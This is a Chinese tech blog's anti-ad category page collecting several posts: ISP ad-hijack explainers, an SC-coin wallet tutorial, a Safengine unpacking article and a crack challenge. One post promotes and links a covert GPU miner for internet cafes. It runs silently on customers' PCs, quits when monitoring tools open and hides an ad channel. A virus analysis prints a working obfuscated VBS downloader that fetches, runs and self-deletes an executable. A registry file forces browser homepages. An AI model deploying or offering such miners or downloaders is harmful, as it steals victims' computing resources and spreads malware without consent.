你好:

     感谢你访问我的 Blog ,本博客只提供博主的技术经验分享,你可以在此做简单的留言和评论,我会抽空回复你;若是要深入交流探讨,请联系QQ:47853253或者加QQ群:12012081


 

分类: 反广告预览模式: 普通 | 列表

防治运营商HTTP劫持的终极技术手段

[Windows]关于映像劫持

Procmon开机启动监控以及使用教程

抓包软件SRSniffer 抓取万象广告IP的方法

370Safe【去广告】安装方法&规则图解

浏览器地址跳转、主页被劫持思路分析

[隐藏日志]

PCHunter删除桌面已生成的广告图标教程

 前言:
云储币用户不多,大多数平台没有云储币交易。 以前最大的云储币平台云币网最近停止钱包发放(据不可靠消息称,其合作公司某人将平台里全部数字货币兑换成比特币转款后跑路了,不知事情是否属实。) 国外SC币网虽然多一点,但是因为没法绑定中国银行卡,没法提现。 现在51数字资产(https://www.51szzc.com/)可以注册SC钱包,以下提供教程:

教程:
1:打开51数字资产网站 : https://www.51szzc.com/
2:点右边“注册”
 
3:输入注册信息:
 
获取验证码输入后,注册即可。
注册完毕后,用手机号+密码登入,点右上角用户名那里:
 
进入个人中心:
 
上面红色5项需要设置,其中KC认证只需要KC1就行,不用传身份证什么的!!!
申请钱包方法:
 

点右上角自己手机号,CNY交易区,左边SC现货交易
右边“充值”按钮打开,如果你没有钱包,会提示你申请一个钱包。
点申请就可以了:
 



卖出SC币的方法:
 
 
提现方法:
到“财务中心”提现
 

----
查看挖矿收益和速度方法:
打开网站:https://siamining.com/
输入钱包地址,点“GO”
注意:
1:初次挖矿可能要15-20分钟后才能查看到收益
2:网站显示的是国外的时间
3:网站每隔6个小时支付一次,满500个SC才会支付。支付完后大约2小时到51数字资产钱包。

 

 

 

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 15

 我们知道电信之前有DNS劫持弹出广告,目前又出现http劫持的方式,在用户浏览器网页右下角弹出弹窗广告。本文分享给大家两种小技巧破解电信劫持广告。

 

  • 电信http劫持广告很多域名或ip地址,可以发现一个添加一个,屏蔽一个
  • 电信DNS劫持广告可以通过修改dns的方法屏蔽
  • 工具/原料

    Chrome

    Proxy Switchy Sharp/Omega

    方法/步骤

    部分电信用户,如果首次打开浏览器,那么经常会有一些几率在页面右下角冒出一个弹窗广告,一般这是电信的http劫持广告。

    例如,这是打开首页的情况,电信用户右下角会出现弹窗广告。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    起初怀疑是百度网站的广告,后来与百度反馈之后,发现应该是电信http劫持广告。

    首先我们到电信网站进行投诉:http://im.189.cn/webclient/index?cityId=5300&info=

    http://www.189.cn/yn/support/fwjd/

    如果电信网站投诉无效,那么这时我们可以通过工信部申诉的方式投诉。

    具体方法是:http://www.chinatcc.gov.cn:8080/cms/shensus/

    打开工信部申诉受理网页,点击电信用户申诉受理按钮。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    仔细阅读电信申诉须知,了解投诉要求。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    然后点击页面下方的

    “我已阅读上述须知”

    和我要申诉的按钮。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    将红框部分信息填写准确完整。最后点击提交即可等待工信部受理案件。

    运气好的话,几天之后电信即可撤销http劫持广告了。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    除此之外,我们还可以通过技术手段,屏蔽电信劫持广告。

    方法是,打开谷歌Chrome浏览器,打开其中Proxy Switchy Sharp

    或者Proxy Switchy Omega扩展,对代理进行设置。

    具体步骤,右击电信弹窗广告部分内容,点击审查元素。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    在源代码中,找到iframe植入广告的网址,一般是域名或者ip地址。

    这些域名或ip地址,就是广告来源。我们将其列入黑名单,让其显示不了广告。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    具体以Proxy Switchy Omega为例,屏蔽广告网址的方法是:

    点击扩展选项。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    创建一种新的情景模式(不妨重命名为banned),然后

    代理服务器设置为127.0.0.1(本机IP地址)或者

    其他明显无法正常访问的ip地址。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

    点击“自动切换”,添加一条网址正则规则,将广告域名或ip地址,添加进去。

    情景模式设置为banned,然后点击应用选项,即可成功屏蔽电信劫持广告。

    2种技巧破解电信http劫持广告(去除右下角弹窗)

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 18

我的sc钱包:

98afd20e10a366f373da5e6f54c0a1011a3867841e68b5ffabfc17aba0e7832a1da01148b587 

V2.0以后的版本为生成单文件,不再有单独的配置文件,方便复制和发放,随便改名!推送到客户机运行即可!
前言:
最近随着数字货币大涨,一些生意不好的网吧用闲置的机器挖矿,虽然可以增加一些收入,但是挖矿同时机器不能做别的。
而做网维的人更苦逼:网吧行业不景气,收入减少,靠着主页增值也赚不了几个钱.....
那么,能不能在客户上网玩游戏的同时挖矿呢?本软件正是为此准备!

特点:
1:本软件可以在开机之后自动挖矿,并且全程自动控制显卡占用、智能识别游戏、完全不影响玩游戏,真正做到用显卡空余资源进行挖矿!!
2:本软件不会出现任何提示,因为sc矿池在国外容易掉,因此本软件会每隔15分钟检测一次矿池连接情况。
3:本软件可以随便改名,支持开机调用!!GTX650以上显卡都可以挖矿!
4:本软件不偷矿,不抽成,但是含一个隐藏广告(无图标,不锁主页,不弹窗,不劫持,不影响上网,绝对安全) 写软件不易,敬请谅解。
5:本软件会根据本人服务器寻找最新矿池,尽量避免丢矿等。
6:本软件会根据设置的进程名自动退出,比如打开GPU-Z或者PcHunter等自动退出,你也可以设置打开任务管理器自动退出。
7:本软件会根据显卡需求动态调整,确保系统流畅。

本软件完全免费,不偷矿。分为免费版和定制版:
免费版:
免费版带有一个广告通道(广告尚未投放),若开始投放,会有隐藏广告,但是绝无图标、弹窗,不锁主页,不影响客户上网。免费版只在Nvidia显卡下运行。
定制版:
定制版:定制版无广告,可选ATi显卡是否挖矿(但是部分ATi显卡兼容性很不好)。定制版一律300元,定制请说明钱包和要排除的进程。
免费版和定制版的基本区别就是以后免费版会投放一个不影响客户使用的隐藏广告

QQ群29572626,欢迎加入讨论。 定制软件或有疑问请联系QQ:8057867


收益说明:
本软件挖的是SC币,你需要有一个SC钱包, sc币价格并不高,专门挖当然不划算,因此网吧老板就不用指望挖这个了。近期SC币也从1.3跌到0.67了,但是作为网吧维护人员还是有的挖的。
按现在的价格(0.062),如果你维护的网吧平均在线1000台电脑的话,一天应该能收个1000块钱左右(比做增值和维护强得多吧!)。

没有钱包的请先注册SC币钱包
钱包注册、提现、收益查看请移步:
http://bbs.txwb.com/thread-2062526-1.html

http://www.cn777.cc/article.asp?id=2092


使用说明:
1:下载程序(地址见帖子最下面),解压,打开 SC网维版生成器 
 

生成后,在文件夹里,有一个叫【SC定制版】的文件,就是你的程序。可以随便改名,投放到客户机即可。
 

如果要打开任务管理器自动退出挖矿,可以把 taskmgr 加到排除进程里面,进程用逗号隔开。


下载地址:

本帖隐藏的内容

百度网盘:
http://pan.baidu.com/s/1hrBG972
解压密码 1234
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 23

 近期,有多位用户在深蓝软件SVIP群里反应了遭遇大面积盗号的情况,希望大家一起分析,因为群里都是些上百家的大网维,很快大家对情况进行了汇总和分析。

首先大家注意看cmd.exe 与  cscript.exe 两个文件被利用并连接了不同的电脑的IP。

006.png

005.jpg

 

同时有SVIP用户反应了该病毒在他的网吧通过 1026端口来传播病毒,并抓住了一段VBS,深蓝简单分析一下这段VBS的含义:

这段VBS代码首先是创建了一个对象,为了迷惑用户和杀毒,采取了 replace在命令中插入多个无用的字符,再在使用前替换掉字符。

然后通过 http://的方式下载 bugreport.exe 文件,之后该 VBS以参数的形式运行  ospp.vbs 192.168.0.172:1026 传入IP与端口。

最后VBS在运行完所有功能后会删除自身。

001.jpg

 

下载的病毒是免杀的,是否是收费机中毒还是和收费软件被利用有关?有待进一步验证。

003.jpg

 

扫描局域网后发现只有收费机开了1026端口。

004.jpg

 

解决办法

用户测试后,屏蔽1026口后问题解决。后面端口可能会变,思路就是这样,灵活去处理吧。

 

评论中的补充,感谢cwfwan

cmd /c "echo dim m,s,k:m=^"MEiEcErEosoft.XEMELEHETETEP^":b=^"ACDCOCDCBC.CSCtCrCeCaCm^":k=^"ScKriptKing.FiKleSystKemObjKect^":Set x=CreateObject(replace(m,^"E^",^"^")):Set w=CreateObject(^"Wscript.Shell^"):Set v=w.Environment(^"Process^"):x.Open ^"GET^",replace(^"hEtEtpE:E//^",^"E^",^"^") ^& Wscript.Arguments(0) ^& ^"/www/bugreport.exe^",0:x.Send():If x.status=200 Then:Set s=CreateObject(replace(b,^"C^",^"^")):s.Mode=3:s.Type=1:s.Open():f=v.Item(^"APPDATA^") ^& ^"\bugreport.exe^":s.Write x.ResponseBody:s.SaveToFile f,2:wscript.sleep(1000):w.Run(^"cmd /c ^"^"^" ^& f ^& ^"^"^"^"):End If:Set o=CreateObject(replace(k,^"K^",^"^")):o.DeleteFile(wscript.scriptfullname)" ˃ C:\WINDOWS\ospp.vbs

更新 2016.08.06

  感谢用户抓到样本发过来,供分析。

更新 2016.08.15

  开机命令加入了cscript.exe和wscript.exe这2个文件的映像劫持了 //感谢网友 让故事继续 提供

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 35

你可能不知道你已经被运营商劫持了

 大家想必一定遇到过这种小助(guang )手( gao ):

这个是移动,当然联通和电信也绝对不会放过你,而且网页中间也能加

还有PC端

其实,你看到的这些广告都是中途被别人暗地里加的,这个别人就是中国特色的合法的黑客-运营商

运营商劫持主要分两种:
一种叫DNS劫持,DNS劫持简单粗暴,会把你重新定位到其它网站,比如比如假设你想访问中国银行,正常的DNS 解析IP应该是中国银行的IP地址(假设是10.1.2.3),但是中间者修改这个DNS解析结果,返回用户一个非中国网银行的IP(假设是10.2.3.4),那么用户就会和这个非中国银行的网站建立连接并产生网络传输。钓鱼网站就是这么干的,钓鱼网站是一个仿冒网站,当你输入用户名、密码它会记住你网上银行的用户名、密码,并用于非法的勾当。你本来想存钱,但钱存到了贼的手里,因为这个违法性实在太大,所以监管会比较严,现在已经不多见了。
DNS劫持的主要预防方法是使用固定的DNS地址,比如8.8.8.8 114.114.114.114,比较简单

另外一种就是HTTP劫持了,一旦运营商发现你的是HTTP请求,就会在里面插入广告,你本来想买块巧克力,运营商确在里面放一坨屎 ,由于国内监管困难,所以我们经常会看到那么多辣眼睛的网站:大波与大腿齐飞,屎尿共低俗一色。 恶心的让人想吐,而且不仅是成人,小朋友的网站也无法避免,我们的下一代就在充斥着色情暴力的环境中成长。

他们是怎么干的呢?我们用一幅图来表示

图中小明本来想上coding.com网站的,经过运营商的时候发现小明发起了一个HTTP请求,大家知道HTTP请求是在网络中是明文传输,而且必须经过运营商,于是运营商就能往里买塞任何东西了。常见的塞JS代码,我们经常看到屏幕上方或者下方的广告就是这样的了;另外一种是它把正常网页的内容全部塞到一个iframe里面,这样广告屏蔽软件就无效了,一旦屏蔽会导致全站都被屏蔽,整个网站都不能活了。不仅给你插广告,而且插的你毫无办法,你胆敢屏蔽我么?难道你不想上网了!

以下是腾讯的某个网站的检测报告:

总体1500万pv的业务,一天竟然有200万的劫持上报,7.5个用户中,就接近有1个用户出现被劫持的情况。
可见,各种运营商(尤其是移动联通)的心是有多黑!胆子是有多大!

如何避免

无法避免,由于是运营商层次的劫持,并不是网站开发者放的,就比如你要回家,必须经过小区的大门,在大门就给你泼一身屎。所以,终端用户无法采取技术手段屏蔽。只有一个法子,投诉,注意哦,你投诉的不是你访问的网站,而是你的网络提供者,是当地的移动、联通电信。

技术手段也能起到一定的效果,但必须在自己的电脑上架设一个代理服务器....我们是一个神奇的国度,被抢劫只能自己想办法...具体方法在月光博客中有介绍,大家可以自行搜索下。但实在实在是不推荐,凭啥我访问正常的网站还要来架设代理服务器?难道人人都必须会写代码吗?

2 对于企业用户而言,其实也完全不必感到愤怒,因为不止是你的小网站,包括BAT, QQ都无法逃脱运营商的魔掌

防(zhēn)狼(cāo)术(dài)
对于网站来说,如果是从Baidu等搜索引擎来的,默认会被Baidu转码,然后给你赤裸裸的贴上广告,如果你的网站不想被剥去外衣、往赤裸的身体上贴广告,加上入下代码即可

HTTPS
HTTPS在应用层又加了SSL协议,会对数据进行加密,当然加密也是有代价的,不同于TCP/IP的三次握手,它需要七次握手,而且加上加密解密等因素,整个系统的性能大概会下降1/10,这样就能基本避免运营商劫持了,毕竟它运营商也会核算成本的,不会像gfw一样有100多层过滤 :)

加代码
如果没法使用HTTPS,就必须在网页中手动加入代码过滤了。具体的思路是网页在浏览器中加载完毕后用JavaScript代码检查所有的外链是否属于白名单,限于篇幅就不写在这里了。大家可以参考这个连接:
http://www.cnblogs.com/kenkof...

 
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 23

 Windows Registry Editor Version 5.00

;360安全浏览器
[HKEY_CURRENT_USER\Software\360\360se6\Chrome]
"homepage"="NCxodHRwOi8vd3d3LmJhaWR1LmNvbS97ODgzNmEwODFlMmYwYTRkMGFkZDQ2YjI2NmM5NWFmZmR9ezg1MWU5NGMxODdiOTlhZjhlNWRkZTYzMDM0NGE5MWVkfQ=="
[HKEY_CURRENT_USER\Software\360\360se5\se6]
"homepage"="NCxodHRwOi8vd3d3LmJhaWR1LmNvbS97ODgzNmEwODFlMmYwYTRkMGFkZDQ2YjI2NmM5NWFmZmR9ezg1MWU5NGMxODdiOTlhZjhlNWRkZTYzMDM0NGE5MWVkfQ=="
;360极速浏览器
[HKEY_CURRENT_USER\Software\360Chrome\Homepage\Default]
"homepage"="aHR0cDovL3d3dy5iYWlkdS5jb20vezA3NTdlMjI1NjNhMTVlZGQ5MmE0NzUwMGExNzFiNjEyfXszZmI1MzFhMTcxYmNhOGI3ZmMzNjc5ZDhlYWQzY2Y2OH0="
分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 92

浅谈safengine系列脱壳

 1. 引言
       本文分享我在学习safengine这个系列壳中所遇到的问题以及解决方法,并结合我写的修复脚本讲解safengine这个系列壳中修复iat,资源等方面的技巧。希望本文章能够抛砖引玉同时也给正在学习这款壳脱壳的朋友一些参考。
(本文选用的被加壳文件为xp自带的记事本,加壳用的是最新的Safengine Shielden v2.3.6.0)

2. 初探
       一般来说,我拿到一款壳,首先做的第一件事就是把程序跑起来,等解码完毕后,看看调用iat的代码变成了什么样。一般来说能搞清楚这部分代码所做的工作,能给修复iat带来极大的帮助。
       首先来看加壳前后iat的变化情况。


图2.1




图2.2

查看更多...

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 16

 Safengine启幕之际,为奠定Safengine品牌的最高端定位,并完全的,彻底的树立Safengine系列产品市场信心

我们将长期开始进行0破解的悬赏活动,赏金:100,000人民币

游戏规则:

挑战目标是生成一个可用的Key文件(见悬赏试练附件),使得程序正常运行,并弹出成功提示。

可以对程序进行任意修改,包括静态、动态补丁等方式,但不容许使用除原程序代码以外的任何方式弹出成功提示(即必须绕过授权系统,使原程序正常运行并提示成功)。

在必要的情况下,参赛者可以通过网络或者到主办方所在地观看正确结果演示,成功即获得由主办方发放的10万元奖金!

最终解释权归主办方所有。

SafengineChallenge试练程序下载点
SafengineChallenge.zip MD5 : 41e6b561c018725518e97299dd8e38af


2010/1/23 追加内容:

由于近期网民对此挑战的关注度极高,但目前还没有符合规则的答案提交,所以主办方Safengine决定:

放出一个标准的授权文件,模拟真实软件的授权过程,消除一些网友对“加密代码没有有效Key无法解密”的质疑。

重申挑战规则,只要生成能使试练程序正常启动的授权文件,即属挑战成功!

SafengineChallenge.key下载点

分类:反广告 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 15